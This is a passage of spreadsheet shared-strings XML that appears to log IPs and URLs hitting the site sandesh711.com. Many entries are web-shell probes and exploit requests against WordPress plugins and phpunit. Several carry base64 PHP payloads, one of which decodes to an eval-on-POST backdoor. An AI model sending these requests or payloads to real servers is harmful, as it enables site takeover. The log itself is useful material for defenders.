    <t>85.159.210.208</t>
  </si>
  <si>
    <t>41.216.188.162</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/about.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/about.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/about.php</t>
  </si>
  <si>
    <t>94.156.68.85</t>
  </si>
  <si>
    <t>45.135.237.171</t>
  </si>
  <si>
    <t>106.196.28.130</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Priyanka%20Kumar</t>
  </si>
  <si>
    <t>91.92.241.144</t>
  </si>
  <si>
    <t>178.70.230.248</t>
  </si>
  <si>
    <t>https://ruerstehee.com</t>
  </si>
  <si>
    <t>205.210.31.6</t>
  </si>
  <si>
    <t>171.79.53.246</t>
  </si>
  <si>
    <t>175.44.42.47</t>
  </si>
  <si>
    <t>http://www.abaiak.com/</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/input.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/general.php?pd=1&amp;mapname=op.php</t>
  </si>
  <si>
    <t>91.92.245.176</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/general.php?pd=1&amp;mapname=op.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/lol.php</t>
  </si>
  <si>
    <t>45.141.215.9</t>
  </si>
  <si>
    <t>5.189.182.90</t>
  </si>
  <si>
    <t>2.58.56.44</t>
  </si>
  <si>
    <t>175.44.42.155</t>
  </si>
  <si>
    <t>80.85.85.43</t>
  </si>
  <si>
    <t>198.235.24.137</t>
  </si>
  <si>
    <t>209.151.153.70</t>
  </si>
  <si>
    <t>2.58.56.160</t>
  </si>
  <si>
    <t>175.44.42.22</t>
  </si>
  <si>
    <t>http://www.hitree.shop/</t>
  </si>
  <si>
    <t>151.80.223.236</t>
  </si>
  <si>
    <t>175.44.42.134</t>
  </si>
  <si>
    <t>175.44.42.173</t>
  </si>
  <si>
    <t>91.92.240.127</t>
  </si>
  <si>
    <t>94.156.64.119</t>
  </si>
  <si>
    <t>118.211.43.122</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Bidisha%20Guha</t>
  </si>
  <si>
    <t>45.61.188.92</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/?author=9</t>
  </si>
  <si>
    <t>94.156.64.120</t>
  </si>
  <si>
    <t>2.58.56.31</t>
  </si>
  <si>
    <t>152.57.164.76</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Asal%20Persian</t>
  </si>
  <si>
    <t>146.190.111.58</t>
  </si>
  <si>
    <t>173.249.21.27</t>
  </si>
  <si>
    <t>188.166.179.44</t>
  </si>
  <si>
    <t>206.189.153.63</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-apxupx.php?apx=upx</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wzy.php?action=door123</t>
  </si>
  <si>
    <t>193.46.255.62</t>
  </si>
  <si>
    <t>87.121.87.254</t>
  </si>
  <si>
    <t>157.47.88.204</t>
  </si>
  <si>
    <t>175.44.42.23</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-admin/css/colors/light/content.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-admin/css/colors/light/admin.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/admin.php</t>
  </si>
  <si>
    <t>152.58.216.38</t>
  </si>
  <si>
    <t>91.92.247.88</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/pxpdzirb.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/light/content.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/light/admin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/acme-challenge/about.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/acme-challenge/cloud.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/radio.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/admin.php?action=beindex&amp;password=sem2023</t>
  </si>
  <si>
    <t>198.235.24.161</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/admin.php?action=beindex&amp;password=sem2023</t>
  </si>
  <si>
    <t>74.125.215.73</t>
  </si>
  <si>
    <t>172.233.207.179</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3Z2YmNsLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/style.php?sig=rename</t>
  </si>
  <si>
    <t>91.92.252.167</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/sample.php?pd=1&amp;mapname=ova-tools.xml</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/style.php?sig=rename</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/sample.php?pd=1&amp;mapname=ova-tools.xml</t>
  </si>
  <si>
    <t>91.92.244.169</t>
  </si>
  <si>
    <t>https://sandesh711.com/wp-content/plugins/incache/index.php</t>
  </si>
  <si>
    <t>163.116.196.44</t>
  </si>
  <si>
    <t>43.135.173.10</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-22.php?sfilename=ovatools.php&amp;sfilecontent=&amp;supfiles=</t>
  </si>
  <si>
    <t>85.215.106.92</t>
  </si>
  <si>
    <t>159.223.55.100</t>
  </si>
  <si>
    <t>45.141.215.135</t>
  </si>
  <si>
    <t>91.92.252.237</t>
  </si>
  <si>
    <t>209.126.83.213</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3FieW5wLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-22.php?sfilename=ovatools.php&amp;sfilecontent=&amp;supfiles=</t>
  </si>
  <si>
    <t>85.209.176.20</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/20021.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/Wp-confiig.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/repeater.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/classwithtostring.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/yxs.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/hoja.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/classapi.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/pm.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/suc.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/w33.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/content.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/pki-validation/wp-sigunq.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/gecko.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/cgi-bin/hyPool.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/IXR/contents.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/wp-login.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/simple.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/xmrlpc.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/acme-challenge/xmrlpc.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/acme-challenge/shell.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/acme-challenge/moon.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/acme-challenge/upfile.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-csuu.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/classwithtostring.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-conflg.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/acme-challenge/install.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ids.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/indo.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/maxx.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/wp-aespa.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/content.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/css.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/User-new.Php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-l0gin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-links.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/atomlib.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/IXR/class_api.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ty.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/lv.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/xl2023.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wordpressdb.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/lufi.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/000.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/batm.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/bak.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/_chosen.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/cjfuns.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/CasperEx.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/11mine.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/xcc.php7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/cl.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/cloud.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp_info.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/bigrendy.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/gix.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/0808.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/jetpack.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.inhec.PhP7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/plugin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/1index.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/core-admin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.ontillex.PhP7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ovatools.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/alfa-rex.php7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/shell20211028.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/atomlib.php</t>
  </si>
  <si>
    <t>91.92.249.58</t>
  </si>
  <si>
    <t>128.199.140.57</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2VsdWdnLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>128.199.99.156</t>
  </si>
  <si>
    <t>146.190.98.197</t>
  </si>
  <si>
    <t>175.44.42.29</t>
  </si>
  <si>
    <t>http://www.startraffic.online/</t>
  </si>
  <si>
    <t>178.79.152.61</t>
  </si>
  <si>
    <t>91.92.253.88</t>
  </si>
  <si>
    <t>143.198.205.39</t>
  </si>
  <si>
    <t>175.44.42.175</t>
  </si>
  <si>
    <t>80.94.93.190</t>
  </si>
  <si>
    <t>158.69.23.79</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/core-builder/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/task-controller/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-task-scheduler/scheduler.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/wp-classic/inc/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-stad.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/twentystd/</t>
  </si>
  <si>
    <t>175.44.42.126</t>
  </si>
  <si>
    <t>http://wgm.wptraffic.xyz/</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/incache/index.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/about.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/geju.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/admin.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/ayk.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp.php</t>
  </si>
  <si>
    <t>54.252.216.154</t>
  </si>
  <si>
    <t>175.44.42.64</t>
  </si>
  <si>
    <t>http://wntdfc.wptraffic.xyz/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/incache/index.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/admin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/geju.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ayk.php</t>
  </si>
  <si>
    <t>https://sandesh711.com/ayk.php</t>
  </si>
  <si>
    <t>https://sandesh711.com/geju.php</t>
  </si>
  <si>
    <t>https://sandesh711.com/wp-content/admin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com/wp-content/plugins/about.php</t>
  </si>
  <si>
    <t>128.199.224.51</t>
  </si>
  <si>
    <t>188.138.1.68</t>
  </si>
  <si>
    <t>205.210.31.8</t>
  </si>
  <si>
    <t>139.180.136.133</t>
  </si>
  <si>
    <t>85.25.43.21</t>
  </si>
  <si>
    <t>54.37.121.239</t>
  </si>
  <si>
    <t>http://simplesite.com</t>
  </si>
  <si>
    <t>50.116.45.214</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2Vma213LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>91.92.253.202</t>
  </si>
  <si>
    <t>http://ogqd.wptraffic.xyz/</t>
  </si>
  <si>
    <t>94.237.41.145</t>
  </si>
  <si>
    <t>https://sandesh711.com/indexall.php</t>
  </si>
  <si>
    <t>64.147.91.228</t>
  </si>
  <si>
    <t>64.147.91.229</t>
  </si>
  <si>
    <t>128.90.193.26</t>
  </si>
  <si>
    <t>https://sandesh711.com/</t>
  </si>
  <si>
    <t>http://ingyark.com//1.php</t>
  </si>
  <si>
    <t>http://foppoliwines.com//wp-2018.php</t>
  </si>
  <si>
    <t>179.60.147.121</t>
  </si>
  <si>
    <t>51.222.158.14</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/style.php?sig=update&amp;domain=51.79.124.111</t>
  </si>
  <si>
    <t>163.116.205.116</t>
  </si>
  <si>
    <t>194.26.192.116</t>
  </si>
  <si>
    <t>87.121.86.3</t>
  </si>
  <si>
    <t>175.44.42.124</t>
  </si>
  <si>
    <t>http://lzdp.smzt.shop/</t>
  </si>
  <si>
    <t>87.121.86.4</t>
  </si>
  <si>
    <t>94.237.111.57</t>
  </si>
  <si>
    <t>94.237.40.237</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/wso.php</t>
  </si>
  <si>
    <t>210.16.94.216</t>
  </si>
  <si>
    <t>91.92.247.145</t>
  </si>
  <si>
    <t>185.241.208.50</t>
  </si>
  <si>
    <t>4.147.169.224</t>
  </si>
  <si>
    <t>163.116.196.46</t>
  </si>
  <si>
    <t>88.198.45.227</t>
  </si>
  <si>
    <t>167.235.146.250</t>
  </si>
  <si>
    <t>172.206.57.10</t>
  </si>
  <si>
    <t>163.116.196.63</t>
  </si>
  <si>
    <t>107.189.11.120</t>
  </si>
  <si>
    <t>163.116.196.39</t>
  </si>
  <si>
    <t>94.237.42.53</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/login.php</t>
  </si>
  <si>
    <t>217.160.57.29</t>
  </si>
  <si>
    <t>43.153.88.74</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/revslider/includes/external/page/up.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/revslider/includes/external/page/shell.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/revslider/includes/external/page/</t>
  </si>
  <si>
    <t>103.167.210.82</t>
  </si>
  <si>
    <t>163.116.212.44</t>
  </si>
  <si>
    <t>163.116.196.33</t>
  </si>
  <si>
    <t>163.116.196.40</t>
  </si>
  <si>
    <t>20.244.7.249</t>
  </si>
  <si>
    <t>141.0.8.130</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Style%20With%20Plixxi</t>
  </si>
  <si>
    <t>http://exc.10khits.com/surf?id=584958&amp;token=8b260e319ce0833a63e53b8a7341760b</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Sumi%20Chitra%2037</t>
  </si>
  <si>
    <t>46.250.227.44</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3J6aW9zLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>156.249.28.32</t>
  </si>
  <si>
    <t>172.234.49.237</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/himal-gitti-pani.html</t>
  </si>
  <si>
    <t>194.169.175.93</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/sample.php?pd=1&amp;mapname=sample-x5.xml</t>
  </si>
  <si>
    <t>116.203.245.162</t>
  </si>
  <si>
    <t>194.169.175.26</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/sample.php?pd=1&amp;mapname=sample-x5.xml</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-base/index.php</t>
  </si>
  <si>
    <t>175.44.42.96</t>
  </si>
  <si>
    <t>http://yfmp.lighthearteds.shop/</t>
  </si>
  <si>
    <t>68.183.178.178</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa25sdmZhLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>194.169.175.92</t>
  </si>
  <si>
    <t>114.119.154.82</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/allgallery/Vidyashree%20Jayaram/1.jpg</t>
  </si>
  <si>
    <t>https://www.wallpaper-hd.com/search/tv9-kannada-news/4</t>
  </si>
  <si>
    <t>23.27.101.55</t>
  </si>
  <si>
    <t>https://sandesh711.com/sample.php?pd=1&amp;mapname=sample-x5.xml</t>
  </si>
  <si>
    <t>107.150.34.146</t>
  </si>
  <si>
    <t>175.44.42.7</t>
  </si>
  <si>
    <t>http://qlfkev.lighthearteds.shop/</t>
  </si>
  <si>
    <t>194.113.74.182</t>
  </si>
  <si>
    <t>20.244.0.66</t>
  </si>
  <si>
    <t>85.114.138.220</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.xas.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/max.php</t>
  </si>
  <si>
    <t>209.151.149.26</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/.xas.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/max.php</t>
  </si>
  <si>
    <t>94.237.45.203</t>
  </si>
  <si>
    <t>91.92.243.106</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/apikey/apikey.php?test=hello</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/royal-ckeditor/admin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/eventon-addon/admin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/classic-addon/admin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/?code_check</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/defaul1.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ms.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/wp-apxupx.php?apx=upx</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/alfanew.PhP7</t>
  </si>
  <si>
    <t>167.88.63.96</t>
  </si>
  <si>
    <t>185.225.33.87</t>
  </si>
  <si>
    <t>98.70.50.23</t>
  </si>
  <si>
    <t>http://www.seosking.xyz/</t>
  </si>
  <si>
    <t>91.92.242.193</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/chosen.php?upload</t>
  </si>
  <si>
    <t>91.92.246.194</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/chosen.php?upload</t>
  </si>
  <si>
    <t>104.250.238.104</t>
  </si>
  <si>
    <t>109.230.226.158</t>
  </si>
  <si>
    <t>45.142.107.45</t>
  </si>
  <si>
    <t>http://middlecoffdentalgroup.com//wp-2018.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-head.php</t>
  </si>
  <si>
    <t>185.216.70.6</t>
  </si>
  <si>
    <t>20.197.4.181</t>
  </si>
  <si>
    <t>20.244.3.207</t>
  </si>
  <si>
    <t>175.44.42.80</t>
  </si>
  <si>
    <t>http://www.dlnk.net/</t>
  </si>
  <si>
    <t>49.42.68.116</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/linkpreview/db.php?u</t>
  </si>
  <si>
    <t>41.216.188.92</t>
  </si>
  <si>
    <t>82.165.78.37</t>
  </si>
  <si>
    <t>172.188.72.27</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ujcawbws.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/beniyihq.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/yfqtrayb.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/favwrqxu.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>194.169.175.76</t>
  </si>
  <si>
    <t>62.141.38.215</t>
  </si>
  <si>
    <t>51.222.44.188</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/simple.phpp</t>
  </si>
  <si>
    <t>163.172.255.9</t>
  </si>
  <si>
    <t>175.44.42.252</t>
  </si>
  <si>
    <t>http://www.besthatcheries.com/</t>
  </si>
  <si>
    <t>194.169.175.23</t>
  </si>
  <si>
    <t>20.244.4.64</t>
  </si>
  <si>
    <t>143.198.215.85</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/king.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&amp;size</t>
  </si>
  <si>
    <t>https://sandesh711.com//wp-content/x.php?1=system</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/abruzi.php4</t>
  </si>
  <si>
    <t>https://sandesh711.com//wp-content/plugins/apikey/apikey.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/apikey/a57bze8931.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-file-upload/ROOBOTS.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wordpresss3cll/up.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/TOPXOH/wDR.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/anttt/simple.php</t>
  </si>
  <si>
    <t>194.113.74.174</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/indexall.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/royal-elementor-addons/assets/js/frontend.js</t>
  </si>
  <si>
    <t>135.125.132.232</t>
  </si>
  <si>
    <t>51.68.212.71</t>
  </si>
  <si>
    <t>94.237.110.126</t>
  </si>
  <si>
    <t>http://www.afshan.shop/</t>
  </si>
  <si>
    <t>107.189.31.250</t>
  </si>
  <si>
    <t>20.118.208.93</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/core-plugin/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/core-plugin/about.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/WordPressCore/classwithtostring.php</t>
  </si>
  <si>
    <t>4.240.84.193</t>
  </si>
  <si>
    <t>4.240.73.85</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/intense/block-css.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/royal-elementor-addons/assets/js/frontend.js</t>
  </si>
  <si>
    <t>94.237.42.42</t>
  </si>
  <si>
    <t>165.22.253.91</t>
  </si>
  <si>
    <t>175.44.42.249</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-pano.php</t>
  </si>
  <si>
    <t>50.84.48.187</t>
  </si>
  <si>
    <t>www.zaldamo.com</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/themes/intense/block-css.php</t>
  </si>
  <si>
    <t>106.67.51.19</t>
  </si>
  <si>
    <t>41.104.66.107</t>
  </si>
  <si>
    <t>45.59.170.80</t>
  </si>
  <si>
    <t>45.81.39.199</t>
  </si>
  <si>
    <t>45.81.39.104</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/core/include.php</t>
  </si>
  <si>
    <t>20.40.52.29</t>
  </si>
  <si>
    <t>93.123.118.249</t>
  </si>
  <si>
    <t>172.233.234.133</t>
  </si>
  <si>
    <t>https://sandesh711.com//wp-admin/css/colors/blue/blue.php?wall=ZWNobyBhRHJpdjQ7ZXZhbCgkX1BPU1RbJ3Z6J10pOw==</t>
  </si>
  <si>
    <t>193.42.32.105</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/admin-ajax.php</t>
  </si>
  <si>
    <t>85.215.232.65</t>
  </si>
  <si>
    <t>170.106.64.177</t>
  </si>
  <si>
    <t>175.44.42.229</t>
  </si>
  <si>
    <t>http://www.harpro.net/</t>
  </si>
  <si>
    <t>34.219.146.12</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/collections/all.atom</t>
  </si>
  <si>
    <t>http://www.gumbo.com/</t>
  </si>
  <si>
    <t>https://sandesh711.com/admin-ajax.php</t>
  </si>
  <si>
    <t>95.214.27.5</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/js/widgets/content.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/js/widgets/contents.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/js/widgets/admin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/js/widgets/about.php</t>
  </si>
  <si>
    <t>85.215.202.242</t>
  </si>
  <si>
    <t>194.169.175.31</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/pridmag/db.php?u</t>
  </si>
  <si>
    <t>165.22.244.119</t>
  </si>
  <si>
    <t>194.169.175.29</t>
  </si>
  <si>
    <t>156.59.198.135</t>
  </si>
  <si>
    <t>https://segudanggambar791.blogspot.com/2021/08/mangala-gowri-maduve-video-call-please.html</t>
  </si>
  <si>
    <t>156.59.198.136</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/uploads/2021/04/Image-1-768x960.jpg</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wordpressseotools/wp-add.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/woh.php</t>
  </si>
  <si>
    <t>159.65.130.242</t>
  </si>
  <si>
    <t>https://sandesh711.com//wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
